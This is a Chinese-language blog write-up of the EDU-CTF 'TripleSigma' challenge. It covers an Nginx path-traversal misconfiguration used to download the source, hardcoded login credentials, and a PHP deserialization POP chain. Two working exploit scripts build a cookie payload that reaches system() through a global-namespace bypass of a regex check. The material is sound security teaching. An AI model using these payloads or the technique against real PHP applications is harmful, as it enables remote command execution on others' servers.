EDU-CTF TripleSigma题解
2019-01-18 18:27:50

文章首发于先知社区:https://xz.aliyun.com/t/3879 EDU-CTF是台大、交大、台科大三个学校的校赛,题目感觉都不错。TripleSigma这道题的反序列化POP链很有意思,官方wp写的很简单,在这里分析一下。 题目地址:http://final.kaibro.tw:10004/ (需要梯zi) [toc]

信息搜集

打开是一个博客页面,注册功能被关掉了,目录也扫不出来东西。 根据报错页面可以知道后端是Nginx 图片.png 众所周知Nginx会由于配置错误产生很多安全问题,可以参考p牛文章:三个案例看Nginx配置安全 比如这里就存在目录穿越漏洞,从而可以下载网站源码。 图片.png 图片.png

代码审计

网站的源码文件很多,lib文件夹下是各种功能的模块文件。根目录下的每个文件都包含了所有模块。首先查看注册和登陆源码,注册代码基本没用。 login.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
<?php
session_start();
if(isset($_POST['user']) && isset($_POST['pass'])) {
$user = $_POST['user'];
$pass = $_POST['pass'];
if(User::check($user, $pass)) {
$_SESSION['user'] = User::getIDByName($user);
$wrong = false;
header("Location: index.php");
} else {
$wrong = true;
}
}
?>

跟进User模块 class_user.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
<?php

class User {

public $func = "shell_exec";
public $data = NULL;
public static function getAllUser() {
$users = array(array('id' => 1, 'name' => 'kaibro', 'password' => 'easypeasy666'));
return $users;
}

public static function getNameByID($id) {
$users = User::getAllUser();
for($i = 0; $i < count($users); $i++) {
if($users[$i]['id'] === $id) {
return $users[$i]['name'];
}
}
return NULL;
}

public static function getIDByName($name) {
$users = User::getAllUser();
for($i = 0; $i < count($users); $i++) {
if($users[$i]['name'] === $name) {
return $users[$i]['id'];
}
}
return NULL;
}

public static function check($name, $password) {
$users = User::getAllUser();
for($i = 0; $i < count($users); $i++) {
if($users[$i]['name'] === $name && $users[$i]['password'] === $password)
return true;
}
return false;
}

public function save() {
if(!isset($this->data))
$this->data = User::getAllUser();

if(preg_match("/^[a-z]/is", $this->func)) {
if($this->func === "shell_exec") {
# ($this->func)("echo " . escapeshellarg($this->data) . " > /tmp/result");
}
} else {
# ($this->func)($this->data);
}

}

public static function getFunc() {
return $this->func;
}

}

可以看到check方法把登陆的用户名密码与getAllUser方法的数组进行对比,有相同的值就返回True。因此我们直接用源码中的kaibroeasypeasy666登陆即可。 另外在cookie模块中发现一处任意反序列化 图片.png

寻找POP Chain

blog.php中如果存在$_COOKIE['e'],则会实例化cookie对象,并且可以触发任意反序列化对象的__tostring方法 图片.png user模块的save方法虽然对shell_exec的参数进行了escapeshellarg处理,且要求自定义函数名开头不能为字母,但是我们可以通过php全局命名空间\进行绕过, 图片.png 进入else条件中进行RCE。

1
2
3
4
5
6
7
8
9
10
11
public function save() {
if(!isset($this->data))
$this->data = User::getAllUser();

if(preg_match("/^[a-z]/is", $this->func)) {
if($this->func === "shell_exec") {
($this->func)("echo " . escapeshellarg($this->data) . " > /tmp/result");
}
} else {
($this->func)($this->data);
}

构造exp(这里我在本地测试了,因为发现题目有问题。)

1
2
3
4
5
6
7
8
9
10
11
<?php
include("lib/class_cookie.php");
include("lib/class_user.php");
include("lib/class_debug.php");

$A = new Debug();
$A->fm = new User();
$A->fm->func = "\\system";
$A->fm->data = "dir";

echo strrev(base64_encode("1".serialize($A)));

测试失败,而官方给的exp却可以

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
<?php
include("lib/class_article.php");
include("lib/class_articlebody.php");
include("lib/class_cookie.php");
include("lib/class_user.php");
include("lib/class_debug.php");
include("lib/class_filemanager.php");


$title = new Debug();
$title->fm = new User();
$title->fm->func = "\\system";
$title->fm->data = "dir";
$content = "foo";
$body = new ArticleBody($title, $content);
$art = new Article("foo", "bar");
$art->body = $body;

echo strrev(base64_encode("1".serialize($art)));

图片.png 它这里把Debug类的序列化对象传给了ArticleBody$title属性,然后ArticleBody类的序列化对象又传给了Article对象的$body属性。 跟第一次测试的思路一样,触发Article对象的__tostring方法 图片.png 从而又触发了ArticleBody对象的__tostring方法 图片.png 而它的$title属性为Debug,从而又触发其__tostring方法调用我们传入的User对象的save()方法构成RCE。

寻找测试失败原因

想了很久才发现是print_title()函数的问题。 图片.png 一直以为他会直接打印字符串,从而触发__tostring。哪里会想到它echo的是$r->body->title 在lib_common.php第99行。

1
2
3
4
5
function print_title($r) {
if(isset($r)) {
echo $r->body->title;
}
}

那么官方的exp就是直接触发Debug__toString方法了,没有那么复杂了,2333感觉好坑啊。

后记

以后读代码一定要仔细认真,不忽略任何一个点,不然要绕大弯路。

Prev
2019-01-18 18:27:50
Next